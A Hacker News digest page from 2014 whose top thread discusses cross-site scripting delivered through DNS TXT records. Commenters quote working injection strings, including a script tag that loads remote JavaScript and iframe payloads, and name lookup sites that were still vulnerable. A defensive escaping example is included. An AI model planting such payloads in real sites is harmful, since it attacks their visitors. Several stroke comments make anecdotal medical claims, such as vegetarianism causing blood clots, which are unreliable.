hacker news with inline top comments    .. more ..    25 Sep 2014 Best
1
TXT Record XSS
988 points by ryanskidmore  6 days ago   227 comments top 46
1
mrb 6 days ago 12 replies      
I am half serious, but how about making HTML served in TXT records a standard trick for serving small web pages very quickly? There are way fewer network round trips:

  1. DNS query for TXT record for example.com
  2. DNS reply with HTML content

Compared with the traditional 7 steps:

  1. DNS query for A record for example.com
  2. DNS reply with x.x.x.x
  3. TCP SYN to port 80
  4. TCP SYN/ACK
  5. TCP ACK
  6. HTTP GET
  7. HTTP reply with HTML content

It would also make the content super-distributed, super-reliable, as DNS servers cache it worldwide (and for free so it would reduce hosting costs :D). Also TXT records can contain more than 255 bytes as long as they are split on multiple strings of 255 bytes in a DNS reply.

Again, I am only half serious, but this is an interesting thought experiment...

Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no longer than the DNS TTL to propagate: the TTL is under your control; you could set it to 60 seconds if you wanted. It is a common, false misconception that many DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I forget) ran an experiment and demonstrated that across tens or hundreds of thousands of clients worldwide, 99% of them saw DNS updates propagated within X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were ignoring it.

3
ryan-c 6 days ago 4 replies      
I enumerated all IPv4 PTR records a few years back, and I saw a couple XSS things there as well. If anyone wants to host that data set somewhere, let me know, would be interesting to see what others do with it.

Edit: I found my data and have a grep running on it, will share what turns up.

Edit2: Somewhat less exciting than I remember:

$ fgrep -- '>' *

x.x.101.130.csv:1298607746,155.92.101.130,<hostname>.nebula.msoe.edu.

x.x.110.35.csv:1298587462,41.191.110.35,www.ahnigeria.org\032<http://www.ahnigeria.org/>.

x.x.126.67.csv:1298594206,75.127.126.67,\032>.

x.x.229.74.csv:1298608599,139.78.229.74,<hostname>.suites.osuit.edu.

x.x.39.239.csv:1298594005,129.89.39.239,<hostname>.uits.uwm.edu.

x.x.49.198.csv:1298613894,195.164.49.198,test.str!\@#\$%^&*\(\)}{\":]['><.,end.domain.test.pl.

x.x.49.199.csv:1298613720,195.164.49.199,test.str<hr><br>end.domain.test.pl.

x.x.49.206.csv:1298603066,195.164.49.206,test.str<hr><bR>omain.test.pl.

x.x.88.109.csv:1298606801,95.211.88.109,ilo.>.88.211.95.in-addr.arpa.

4
philip1209 6 days ago 4 replies      
I added FartScroll.js from the Onion to my text records:

http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=A...

5
SEJeff 6 days ago 1 reply      
From any Linux (or probably OS X) workstation / server, you can run the command "host -t TXT jamiehankins.co.uk" ie:

$ host -t TXT jamiehankins.co.uk

;; Truncated, retrying in TCP mode.

jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"

jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all"

jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>"

jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"

6
kehrlann 6 days ago 4 replies      
This is hilarious, but could this potentially be a real threat to anything?
7
AsakiIssa 6 days ago 2 replies      
Wasn't expecting that at all! Had several tabs opened and was really confused for a few seconds while I tried to find the tab with 'youtube on autoplay'.

Firefox needs to show the 'play' icon for the audio tag.

8
ryanskidmore 5 days ago 1 reply      
Who.is have fixed it now, but you can still see it in action over at archive.org

https://web.archive.org/web/20140918191824/http://who.is/dns...

9
garazy 6 days ago 0 replies      
I've found about 80 TXT records with <script tags in them - most of them look like the person not understanding where to paste a JavaScript snippet over XSS attempts, here's all of them -

http://builtwith.com/script-tags-in-TXT-records.txt

There's a few that are "13h.be/x.js" that look like someone trying this out before.

10
jedberg 6 days ago 1 reply      
Come on people, this is so basic. If you didn't generate the data, don't display it on your web page without filtering it. It blows my mind that this isn't just everyone's default.
11
rbinv 6 days ago 3 replies      
Clever. I didn't get it at first.

Never trust user input.

Edit: See http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki... for the actual code.

12
colinbartlett 6 days ago 0 replies      
Bravo, I just embarrassed myself in a very quiet meeting.
13
toddgardner 6 days ago 0 replies      
The most clever exploit of XSS I've ever seen. Beautiful. Bravo.
14
JamieH 6 days ago 0 replies      
Still working here if anyone is yet to see it.

http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....

15
Sanddancer 6 days ago 0 replies      
Given how many whois sites cache results, I wonder how many of them are also vulnerable to SQL injections...
16
kazinator 6 days ago 1 reply      
Since there is very little discussion in the link, pardon me for stating what may be obvious to some, but not necessarily everyone.

The point here is that:

1. DNS TXT records can contain HTML, including scripts and whatever.

2. Domain registrants can publish arbitrary TXT records.

3. TXT records can appear in pages generated by web sites which serve, for instance, as portals for viewing domain registration information, including DNS records such as TXT records.

4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks (XSS) on their visitors if they naively paste the TXT record contents into the surrounding HTML.

5. The victim is the user who executes a query which finds the malicious domain which serves up the malicious TXT record that is interpolated into the displayed results. The user's browser executes the malicious code.

Thus, when you are generating UI markup from pieces, do not trust any data that is pulled from any third-party untrusted sources, including seemingly harmless TXT records.
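
The failure described in the comment above, next to the output-encoding fix, as an added example (it is not part of any comment in the thread and not code from any of the sites mentioned). The record values are constructed and the function names are hypothetical; it goes slightly beyond TXT by escaping every field of every record type, and it decodes DNS presentation escapes such as `\032` before escaping so the encoding is applied to what the browser will actually receive.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample answers in DNS presentation format (not real lookups).
SAMPLE_RECORDS = [
    ("example.test.", "TXT", "v=spf1 include:spf.example.test ?all"),
    ("example.test.", "TXT", "<script src='//cdn.example.test/x.js'></script>"),
    ("example.test.", "TXT", r"\060iframe src='//video.example.test/'\062"),
    ("10.2.0.192.in-addr.arpa.", "PTR", "test.str<hr><br>end.example.test."),
]

# Presentation-format escapes: backslash + three decimal digits (a byte value),
# or backslash + any single character (that character, literally).
_ESCAPE = re.compile(r"\\([0-9]{3}|.)", re.DOTALL)


def decode_presentation(text):
    """Turn \\DDD and \\X escapes into the characters they stand for."""
    def replace(match):
        token = match.group(1)
        if len(token) == 3:  # only the three-digit alternative is this long
            value = int(token)
            if value > 255:
                raise ValueError(f"escape out of byte range: \\{token}")
            return chr(value)  # bytes above 127 are mapped as Latin-1
        return token
    return _ESCAPE.sub(replace, text)


def render_row_naive(name, rtype, rdata):
    """Vulnerable pattern: record data pasted straight into the page markup."""
    cells = (decode_presentation(v) for v in (name, rtype, rdata))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


def render_row_safe(name, rtype, rdata):
    """Decode first, then HTML-escape every field at the point of output."""
    cells = (html.escape(decode_presentation(v), quote=True)
             for v in (name, rtype, rdata))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


class _TagCollector(HTMLParser):
    """Records the name of every element start tag in a fragment."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)


def injected_tags(records, render_row, allowed=("tr", "td")):
    """Regression check: which elements did record data add to the markup?"""
    found = set()
    for record in records:
        collector = _TagCollector()  # fresh parser per row
        collector.feed(render_row(*record))
        collector.close()
        found |= collector.tags - set(allowed)
    return found


if __name__ == "__main__":
    print("naive renderer lets through:",
          sorted(injected_tags(SAMPLE_RECORDS, render_row_naive)))
    print("escaping renderer lets through:",
          sorted(injected_tags(SAMPLE_RECORDS, render_row_safe)))
    for record in SAMPLE_RECORDS:
        print(render_row_safe(*record))
```

The `injected_tags` check is the kind of test worth keeping in a lookup tool's suite: any record field that can create an element in the rendered page is a finding, whatever the record type.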

17
mike-cardwell 6 days ago 0 replies      
A while ago I experimented with adding stuff to the version.bind field in bind. Just updated it:

mike@glue:~$ dig +short chaos txt version.bind @198.211.125.252

"<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"

I put this in my named.conf:

version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>";

This site is vulnerable:

http://dnscheck.pingdom.com/?domain=grepular.com

Although takes a minute before it kicks in. I did report it to them at the time, but never got a response.

18
elwell 6 days ago 1 reply      
In playing around with this hack, I discovered that Dreamhost doesn't properly escape TXT records in their admin interface when modifying DNS records. I put an iframe in and it shows the box but the src is removed; it also killed the page at that point so I'm unable to remove it...
19
bwy 6 days ago 3 replies      
Wish there was a warning, because I accidentally clicked this link in class just now.
20
0x0 6 days ago 0 replies      
Can it be done with CNAME and SRV records too?
21
Thaxll 6 days ago 2 replies      
It has nothing to do with TXT record, it's just the website that renders HTML. It could be any source.
22
gsharma 6 days ago 0 replies      
Not sure how Trulia handles input for its usernames, but at one point I was able to do this http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...
23
js2 6 days ago 0 replies      
All editors should, upon save, put up the following prompt:

"I acknowledge the code just written does not trust its input, under penalty of being whipped by a wet noodle."

But I guess folks would just click through.

Sigh.

24
sidcool 5 days ago 1 reply      
I opened this link on my Android's Chrome browser. The top search text input started wildly convulsing. First I thought the post was about that. But I didn't really get what this is about.
25
sanqui 6 days ago 1 reply      
Looks like the who.is site has patched the exploit up a few minutes ago.
26
gcr 6 days ago 0 replies      
Warning: this page links to (loud!) automatic playing audio.
27
tekknolagi 6 days ago 0 replies      
This is hysterical.
28
homakov 5 days ago 0 replies      
XSS on a shitty website not doing trivial sanitization gets 900 points on HN, oh guys you are disappointing me so much.
29
indielol 6 days ago 0 replies      
Wouldn't this make it super easy for Google to ban (show the security warnings in Chrome) the domains?
30
nerdy 6 days ago 0 replies      
Best POC ever.
31
_RPM 6 days ago 1 reply      
When I went to the page, it started playing music. I find that very frustrating and annoying.
32
bdpuk 6 days ago 0 replies      
I've seen similar examples with HTTP headers and sites that display those, nice angle.
33
general_failure 6 days ago 0 replies      
Well played sir, very well played
34
thomasfl 6 days ago 0 replies      
Finally somebody found a way to put html injection on to good use.
35
wqfeng 6 days ago 1 reply      
Could anyone tell me what's about? I just see a DNS page.
36
tedchs 5 days ago 0 replies      
FYI it looks like who.is fixed the XSS bug.
37
ginvok 6 days ago 0 replies      
Aaaand now I'm deaf :) Gotta learn sign language
38
iamwil 6 days ago 3 replies      
How does this work?
39
ing33k 6 days ago 0 replies      
good hack but really stupid of me to click it directly :\
40
PaulSec 6 days ago 0 replies      
I wonder how this got so many points.. Reflected XSS in 2014, yeah..
41
himanshuy 6 days ago 1 reply      
What's up with the search box?
42
zobzu 6 days ago 0 replies      
That made me laugh, good one :)
43
notastartup 6 days ago 0 replies      
man...I woke up and got a dose of surprise....love this song.
44
r0m4n0 6 days ago 3 replies      
isn't this technically illegal to demonstrate haha?
45
st3fan 6 days ago 0 replies      
Wonderful!
46
sprkyco 6 days ago 0 replies      
Luckily it does not work on my normal browser: https://www.whitehatsec.com/aviator/
2
ISRO Mars Orbiter Mission: Spacecraft successfully enters Martian Orbit
950 points by skbohra123  1 day ago   140 comments top 42
1
noisy_boy 13 hours ago 4 replies      
People who keep making the (nonsense) point of space vs. better roads keep harping on how the money will be better spent on infrastructure.

I looked up the Indian planning commission's budget for 2013-14 road development. Planning Commission provided an annual outlay of Rs.37,300.00 Crore for 2013-2014 for development in road sector[1]. That is more than 6 billion USD - just for improving roads, for a year.

The budget of the Mars Orbiter mission was around 75 million USD[2] i.e. less than 1.5% of [1].

[1]: http://www.performance.gov.in/sites/default/files/department...

[2]: http://www.forbes.com/sites/saritharai/2013/11/07/how-indias...

2
sidcool 22 hours ago 6 replies      
I remember when in 2012, the then PM of India had declared this project. The entire internet community came together to deride this, saying it's not possible in a couple of years and that India had better feed its hungry etc.

I am a very proud Indian today. This achievement, like other by humanity (LHC in particular), will encourage me to push myself towards greatness.

3
suprgeek 1 day ago 4 replies      
What is even more commendable is that it was done pretty cheaply [1]. Granted the capabilities of some of the other craft are different - but not THAT different. Add to this the fact that this was a success in the first shot - getting a craft from the Earth to Mars Orbit correctly in one shot on a meager budget is indeed a stunning success for ISRO.

[1] https://twitter.com/WSJIndia/status/514591179363864578/photo...

4
swatkat 1 day ago 2 replies      
MOM spacecraft was launched last year (5th Nov 2013) and today it entered into Martian orbit. Here's the twitter handle of spacecraft: https://twitter.com/MarsOrbiter

Mars Orbit Insertion was covered live on ISRO webcast (http://webcast.isro.gov.in/), Doordarshan National TV and other channels. Here's the complete coverage of MOI: https://www.youtube.com/watch?v=VZL_Vwy0JqI

MOI sequence of events: http://spaceflightnow.com/mars/mom/status.html

MOM carries five scientific payloads: http://www.isro.org/mars/payload.aspx

Expecting first set of colour pictures from MOM by today evening (IST) :)

5
realrocker 1 day ago 2 replies      
Not only did Mom reach Mars, she also got a pretty good bargain on it. So Indian :)
6
SoulMan 23 hours ago 3 replies      
Given that HN is a more intellectual and educated group, there is no one here who is criticizing the money spent. But there were skeptics who did criticize initially. It basically represents the sample of the population who probably never understood the meaning of space exploration. Most of them are partially educated or educated with a faulty system. It does not just apply to India; there are people sitting in US Congress who think NASA is a waste of money. The same people would have blamed ISRO for INSAT, GSLV & PSLV back in the days when there were a bunch of satellites already doing similar work. It's only because of those ISRO efforts that today we have our own geo-sensing and satellite communication without having to buy from external agencies or compromise our security.
7
corford 13 hours ago 0 replies      
Successful Mars orbit for 0.42% of the price Facebook paid for Whatsapp.

Awesome job and glad ISRO doesn't seem to suffer from the same bad luck the Russians do when it comes to Mars!

8
pdevr 1 day ago 1 reply      
Twitter handle of ISRO's Mars Orbiter: https://twitter.com/MarsOrbiter

First tweet: "What is red, is a planet and is the focus of my orbit?"

9
gordon_freeman 23 hours ago 1 reply      
Great news for India's space program especially considering INR4.54 billion (US$74 million) cost for an interplanetary mission like this, it should be a crash course in frugal space engineering. I really believe ISRO can form a close partnership with NASA in future to launch supply to ISS and much more.
10
vs4vijay 22 hours ago 2 replies      
Hollywood movie Gravity costs more than this space mission.
11
roywiggins 13 hours ago 0 replies      
This is massively inspiring. Huge PR boon for India, and they obviously deserve it.

Super happy about this. Welcome to the interplanetary club!

12
zkirill 1 day ago 2 replies      
It is so incredibly inspiring to listen to a PM speak about space, science, research and exploration for more than an hour. Does anyone know if this is broadcast on Indian national TV?
13
nitin_flanker 22 hours ago 2 replies      
I really want that people around the world should stop saying that this is a cheap mission. Instead you can say that this one is economical mission.

Saying it cheap is derogatory remark. ISRO was thrifty while spending funds on this mission.

14
r0muald 8 hours ago 0 replies      
I didn't see anyone compare this success at first attempt with the (partial) failure of Jade Rabbit https://news.ycombinator.com/item?id=7226307 however that seems a more interesting comparison between newcomers to space exploration rather than, say, NASA missions.
16
bharath28 13 hours ago 0 replies      
Respect. For sheer aplomb & perseverance. It is moments like these that make me want to put my head down and march on no matter what.
17
kjs3 11 hours ago 0 replies      
Congrats, India. Welcome to the club. Hopefully you'll have many more successes.
18
prithvitheprime 20 hours ago 0 replies      
It was lowest priced spacecraft ever sent to Mars; Congrats India (big move on creating low priced space shuttles)
19
chdir 14 hours ago 0 replies      
Previous discussion on the budget : https://news.ycombinator.com/item?id=7964261
20
girvo 23 hours ago 0 replies      
What an amazing achievement! And what a retro looking website! Congrats to the team, this is something to be proud of.
21
murukesh_s 21 hours ago 1 reply      
NASA - Do you want to Outsource? ;-)
22
alphakappa 1 day ago 0 replies      
The odds were against them, and yet they managed to pull this off on the first try. Congratulations ISRO! http://www.bbc.com/news/world-asia-india-29307123
23
return0 17 hours ago 0 replies      
I'm surprised it's not discussed here ... but the ones who should be worried here is SpaceX, not NASA.
24
nmridul 1 day ago 0 replies      
Title should be "India's mars orbiter ..... "
25
lmm 20 hours ago 0 replies      
Does anyone maintain an up-to-date version of the Mars Scorecard? What's Earth's average for this decade?
26
skbohra123 1 day ago 0 replies      
Webcast of the event can be seen here http://webcast.isro.gov.in/
27
mukundmr 21 hours ago 0 replies      
I hope events like this will help rekindle the interest in science and that ISRO gets a budget boost.
28
jamesmalvi 21 hours ago 0 replies      
Proud to be Indian.. Well Done India... I hope we get the best out of this trip
30
gude 13 hours ago 0 replies      
That's one giant interplanetary leap for India
31
bane 1 day ago 0 replies      
Absolutely amazing, congratulations India!
32
pranayairan 19 hours ago 0 replies      
Awesome achievement, go go go.
33
kamakazizuru 18 hours ago 0 replies      
cue haters talking about lack of toilets/education/too much rape/other random social issue that exists in India they heard about that one time in the news - and how India should fix that instead of developing technology...in 5..4..3..2..1
34
shashikant52004 23 hours ago 0 replies      
Congrats team india!!!
35
gauthamilango 20 hours ago 0 replies      
Congrats ISRO!!!!!
36
arc_of_descent 21 hours ago 0 replies      
Congratulations!
37
nagarch 22 hours ago 0 replies      
Simply Amazing...
38
jpatel3 1 day ago 0 replies      
It's a proud moment!
39
digifire 20 hours ago 0 replies      
I just wish ISRO was privately held like SpaceX and giving it a run for its money. You would get the students in India really inspired to learn real engineering.
40
general_failure 23 hours ago 0 replies      
Congrats India!

In other news, http://isro.gov.in/ has a <blink> tag :) Some parts of ISRO aren't catching up with technology :))

41
jacko0 17 hours ago 2 replies      
Well Done! But $74 Million could have been spent giving toilets to Indians, so that they don't have to shit in the streets.
42
seesomesense 21 hours ago 0 replies      
Good practice for ICBM development.

India's current IRBMs can target all of China. The goal is to be able to target all of the mainland United States.

3
I Had a Stroke at 33
596 points by Thevet  3 days ago   151 comments top 30
1
ohquu 3 days ago 2 replies      
What a beautiful article.

My girlfriend had three strokes, in succession, two years ago (when she was 22). The night before these strokes occurred, she had a transient ischemic attack (TIA). She began speaking gibberish to her friends. She texted me later that night explaining what happened. Her friends had laughed about it because they thought she was just acting like a goofball. I had no idea these were signs of a TIA, but I told her that if it happened again she needed to go to the doctor immediately.

The next day, the right side of her body went numb. This time, she was around people who noticed something was wrong, and she was immediately rushed to the emergency room. By the next day, I had flown a thousand miles (from the location of my new job) to be with her. She couldn't remember many words. She couldn't read a clock. She did not know the answer to 3 + 0.

It turned out that, similar to the author of this article, clots had traveled through the hole in her heart and up to her brain. Luckily, she recovered fully and was back to her old self within about a month. She had surgery to fix the PFO a couple months later. The neurologist told her that nine times out of ten, the clot travels a different path, and the victim is left dead or braindead. I am so lucky. Writing about this has me in big tears.

I am going to stop writing and go hug her now.

2
weddpros 3 days ago 5 replies      
I was 32 when I had a stroke (March 4th, 2003). It was a different kind of stroke, affecting a different part of my brain, essentially related to vision. I was half blind, but I only realized something was "strange" when I saw myself in the mirror: I had only one eye. My brain knew I should have two: I was half blind.

The first diagnosis was migraine with aura (blindness in my case). But the aura should have lasted no more than an hour. Two days later, the aura (blindness) was still there (a sign of infarct but my doctor didn't know it).

I spent 2 days alone in the dark. I forgot to eat but I knew I had to call a taxi to take me to the hospital. I wasn't scared, I thought it was just a migraine. It really looked and felt like my usual migraines. So my doctor had me take anti-migraine pills, which are vasoconstrictors. That might have caused the actual stroke: extreme vasoconstriction. Never take anti-migraine treatment during the aura. Never.

It took 2 days before I was diagnosed at the hospital, but they just told me "I see a shadow on the CT scan"... so I spent the next 2 days wondering what kind of shadow? stroke or cancer? And no, I didn't think about asking.

It took one week to be hospitalized for 10 days (my mother called the hospital, harassed them until she could talk to a doctor, who said it was an emergency... one week after the stroke).

It took 15 days before I woke up in the morning and thought "Wow! WOW! I'm back now!". Before that, I spent most of my time sleeping, reading half a page between two naps. I was sleeping more than I was awake.

It took 3 months before I could look at everything I wanted. Before that, looking at trees (and other complex objects) was "painful", and watching movies was too exhausting (especially action movies). During these 3 months, I recovered from blindness, but not completely. I still have a blind spot in my field of view today.

It took 6 months before my mood was really restored. Before that, I needed a daily nap, lots of soothing music, and no pressure at all.

I took aspirin daily for 3 years, after which my neurologist told me I could stop.

I had a few migraines after that, and even ended under oxygen at the hospital once, but I always recovered within 15 days.

It was 10 years ago, and it changed my life. I quit my job as a developer, spent 2 years wondering what to do next, then became a wedding photographer. In February this year, almost 10 years after, I got a new job as a developer.

I'm back on rails (node.js to be precise :-)

3
tucaz 3 days ago 1 reply      
About 15 years ago my father had a stroke at our house. I was about 12 years old and at home at the time along with my grandmother. We didn't know what was happening. At one second he was okay and in another he was on the floor. It was almost impossible to put him back at the bed even with the help of one of our tenants.

We called my mother at work and the funny thing is that before she came home to take him to the ER he was able to ask for coffee (and drink it) and also to smoke a cigarette.

Moving 15 years forward he's still with us (62 years old) with no movement at all on the left side of his body. Had a heart attack with major surgery, is on more than 15 different medications, has diabetes and a bunch of other "minor problems".

My mother gave up her life to take care of him and everyday is a struggle because of the existing problems prior to the stroke and the ones that came after he became bitter and really mean to those who love and take care of him.

I'm not sure why I wrote about this but I felt like sharing. It's not easy when people don't recover, but for some reason I believe we have to take care of them and do our part.

4
ZeroCoin 3 days ago 1 reply      
>I wandered outside the boundaries of telemetry. They lost my heartbeat. When I returned, they scolded me.

The audacity of health care industry workers (those who should know what a certain disease entails) who place blame on their patients for acting normally is infuriating.

I had kidney stones once at a young age. I remember barely walking into the emergency room one night after they became too painful.

As soon as I arrived, white as a sheet of paper, they asked me a few questions... doped me up on morphine... and managed to "lose" me on a gurney in a hallway somewhere for a few hours until my girlfriend at the time came and found me.

They took xrays I believe and I was free to go with some more painkillers in hand.

Apparently the hospital told me that I was supposed to call them by X date if I wanted any more painkillers.

I called them back about a week after that date had passed, asked for a refill, and was scolded like I was some drug addict just looking for a fix. I think they even hung up on me. How could I be so stupid as to have forgotten a date they told me when I was high as a kite by their own doing? Right.

I ended up passing them without any painkillers which as many of you have probably heard is unbelievably painful.

I understand that it can get monotonous working in a hospital, but with the amount of money they're paid to work there you would hope that they would be required to operate with a little compassion. Considering the fact that many people in a hospital are leaving this world.

What if the author's last memory was that of a person she didn't know berating her for something she wasn't sure she even did?

5
TAM_cmlx 3 days ago 1 reply      
Two years ago this October I was homeless. I would wander around all night for fear of attacks[1] and try to sleep during the day at the university while sitting on a bench or chair. In October the winter shelters had not yet opened here, and it was so cold I feared I would freeze to death. I wandered into ER on a pretext: there was a swelling in my leg, spider bite maybe?

I overheard the intake person talking with someone: "I'm worried about that guy in #68." Why? "He thinks he's got a spider bite, but he's got blood clot written all over him."

I felt pretty good about that; it meant I'd have a place to sleep for a whole night. Then I was suddenly surrounded by 5 or 6 people.

Symptoms, sir?

Sometimes slurred speech, tingling in the extremities, can't spell anymore, confused by the way people talk so _fast_, confused by simple things, excessively paranoid, feels like there's an Ace bandage wrapped around my chest.

You're a junkie. No. You're exclusively vegetarian. No. You're diabetic. No, I've been tested for that. Well, we'll take a blood draw.

I got an ultrasound over my legs -- and they discovered a DVT. Next thing I knew, they'd slapped me in hospital for eight days. I was put on no less than eight medications, the scariest of which was Coumadin (same as Warfarin, I think?) -- scary because they made me watch a video describing it, by which I mean "You follow these instructions to the letter or you gonna die, son." At least that's what it felt like. And I had to sign all kinds of waivers, or something. Two of the residents (very young women) told me that they had had DVT's themselves... possibly as a result of being exclusively vegetarian?

The diagnosis was: Pernicious Anemia. My understanding (which is not to be trusted) is that the myelin sheathing around my nerves has been dissolving for years. Apparently the communicating tissue between the axons in my brain had been going away for quite some time.

I liked this diagnosis because: it's easily treatable; it explains my increasingly weird behavior; I'm not dead from it.

The treatment is: Take B12 every day for the rest of my life.

The highly-abbreviated coda to the story is: My Doctor told me I'd had this disease for at least ten years(!); hospital got me a case manager, who got me Disability, Homed, and a Laptop. But it took 2 years or so.

TLDR: Being exclusively vegetarian can cause DVT's

[1]http://www.youtube.com/watch?v=lM6WrqLMJrQ

6
huhtenberg 3 days ago 8 replies      
Remember this -

  You have FOUR HOURS to get a person with a stroke to the emergency. 
If you do, their chances of survival are dramatically higher.

7
patio11 3 days ago 2 replies      
My mother had a stroke. The fallout is very, very hard for the patient and their family.

Diet and exercise are, apparently, the easiest levers you have to control for stroke risk. Trust me: this is the best of all possible reasons to care about those. You do not want to go through it and you do not want your family to go through it. Specifics elided for privacy but suffice it to say that it combined elements of a heart attack, advanced Alzheimer's, and a profound war injury in a compact package that arrived on a normal sunny Tuesday.

8
pragone 3 days ago 0 replies      
Strokes can present in truly any number of ways. The Cincinnati Stroke Scale, often seen in public health campaigns as "FAST", provides three simple, quick assessments that can reliably delineate a majority of strokes. It is the standard for basic EMTs as well. More advanced providers should perform a more comprehensive exam, testing all the cranial nerves (actually usually just II through XII). A more formalized, advanced stroke scale is the NIH stroke scale: http://stroke.nih.gov/documents/NIH_Stroke_Scale.pdf

While there is often some kind of neurologic deficit associated with a stroke, the gold standard is, of course, a CT or CTA that should be administered immediately upon arrival in the ED of a suspected stroke (depending on the presentation of symptoms an exam by a neurologist may occur first).

The symptoms described in this story would absolutely make me think this person was having a stroke if she had verbalized them to someone with my training.

It's also worthwhile to point out that the person having a stroke may not realize they are having a stroke. People may have the obvious symptoms - slurred speech and hemiparesis - and refuse to acknowledge that these problems exist, because, in their mind, they don't.

If you think someone is having a stroke, record the time you first noticed symptoms and call 911 immediately.

9
day_ 3 days ago 0 replies      
Great article.

I had a stroke one night in my 20's. When I woke up, my right side was numb (I thought I just slept on my arm), I spoke gibberish and was unable to write but I felt fine and I thought I spoke perfectly fine. I finally figured out that something was not right when I tried to write a message to my mom on the back of an envelope to tell her that I was fine and I just drew a straight line instead of letters. That's when she called an ambulance.

Luckily I was back to normal within a month, but I struggled for some time to find the right words when talking.

10
tluyben2 2 days ago 1 reply      
I had a TIA when I was 28 (over 10 years ago) and under heavy stress (high blood pressure; they did not find any other causes; I was healthy as I could be, just extreme stress from my own business at that time); I swore after that to never be stressed again (and took measures to make sure that is possible, like living in southern Spain for large parts of the year) and haven't been since. I even forgot how it felt. My life is so much better that I now thank this TIA. Stress is pure hell and whatever business people think they get out of it; it's bullshit IMHO; I have had way more business success than ever without stress than I had with.
11
alexitosrv 3 days ago 0 replies      
Four weeks ago my girlfriend, 32 yo, had a brain stroke because of a deep venous thrombosis at her left side of the head. It was intense to see how much she deteriorated in the course of just a few hours, starting with a seizure and some very acute headaches she had together with vomiting the previous days. We were in intensive care around 10 days, and then 3 days more in hospitalization. The investigation of her tendency to hypercoagulate yielded as main culprit sedentarism and the previous uninterrupted usage of oral contraceptives (mercilon) for almost ten years. We were fortunate in some sense as the cause was easy to point out and also as we discarded autoimmune diseases (my biggest concern) and now she is under low molecular weight heparin, hoping that the clot is reabsorbed in two or three months.

As part of the recovery, I'm reading to her My Stroke of Hindsight, of Jill Bolte Taylor, and her symptoms and the description of the episode of the acute phase match largely: speech loss, paralysis of her right part of the body and rational disconnect with external stimuli.

This article highlights also how sensible we are to the changes of what we are at the end: physicochemical interactions. I was worried my girlfriend would lose her essence, but thanks to God her recovery has been amazing so far.

12
treehau5 3 days ago 0 replies      
I am not sure if you are the OP or know her, but this story touched my heart. It is beautiful. I can only imagine how strong she has to be, and the people around her must be to get through this. My sister and her husband are going through the very same thing -- He was progressing very well in his career and they just had their first child when he suffered his from the same reason - a hole in the heart. All the best. You and all the stroke victims have my prayers tonight.
13
pimentel 3 days ago 1 reply      
All the stories I know and heard of stroke victims in their 30's or 40's make me think and ask: is there really a way to prevent or predict a stroke?

Would the "controversial routine full body scan" help? Specially to people who have a parent being an early stroke victim?

These things are scary as hell...

14
skizm 3 days ago 2 replies      
Remember FAST: http://en.wikipedia.org/wiki/FAST_(stroke)

First 3 minutes of the house episode Fetal Position (S3 E17) demonstrate it.

15
Pxtl 2 days ago 1 reply      
> Each night, I took the box of Lovenox syringes and carried it to my husband, sobbing. It's time for my shot, I said, tears streaming down my face.

> Each night, he pinched skin on my belly as I screamed like a toddler and he injected the medicine.

Her husband sounds like an awesome guy - taking care of her in that state sounds incredibly difficult.

> My husband and I decided to get a divorce.

> I think in hindsight, it was your stroke that changed everything for me, he said.

> I thought it was the affair he'd had. But maybe he had a point. Maybe that was the year, I said.

Dang.

16
camperman 3 days ago 1 reply      
Her memory experience was already reminding me of Leonard in Memento and then she writes, "it's time for my shot." That hit me unreasonably hard.
17
spindritf 3 days ago 3 replies      
Well, I just popped an Aspirin for no reason.
18
GuiA 3 days ago 3 replies      
Will smartwatches with heart rate/other health sensors be able to detect strokes right when they happen? Or maybe even slightly before they do?
19
glxc 3 days ago 0 replies      
This is an amazing article and incredible blog

Among many interesting and inspiring themes, of interest to the HN community may be the disassociation of vision and objects. All of the deep learning models succeeding in classification emulate one side of the brain, while perspectives like this present life outside the constraint of rational thinking.

20
cell303 3 days ago 0 replies      
I was terrified after reading this. Reminded me that I should live a bit healthier, not drink more coffee than water, got to sleep earlier, wake up earlier, maybe even exercise. But more important, it got me thinking. The non-routine kind of thinking. Read some old diary entries. Wrote a new one, after almost a year.
21
jlavarj 2 days ago 0 replies      
My wife had a stroke at the age of 30, seven years ago. It happened in the hospital during an embolization procedure. She was unconscious for 5 days. This event has obviously changed her life, but I wasn't prepared for the ways it would change mine. Thank you for sharing this.
23
taybin 2 days ago 0 replies      
This was on buzzfeed?? Crazy. Didn't think those soul-less bottom-feeders would turn to quality long-form essays.
24
delackner 2 days ago 0 replies      
Profound. Thank you for sharing this. It pains me to read though that you had years of abnormal symptoms (severe shortness of breath, migraines, etc) and the medical system was unable to detect the issue early. This seems like the sort of issue that early detection could provide tremendous quality of life / survivability improvements at little risk. If the existing tests are too difficult, then we need more tests.
25
yousifa 2 days ago 0 replies      
This is the best piece I have read in a while. It is amazing how something so small could affect our life. We are so delicate. Do you actually see objects as shapes and colors (as in, was the part of the brain that translates the signal into images lost) or was that you can not figure out what it is that you are looking at?
26
dgorges 2 days ago 0 replies      
There is a similar TED Talk worth watching:

Jill Bolte Taylor: My stroke of insight

http://www.ted.com/talks/jill_bolte_taylor_s_powerful_stroke... (18:19 min, Feb 2008)

27
nikant 2 days ago 0 replies      
Such a well written article. I loved the details with which the incident was described.
28
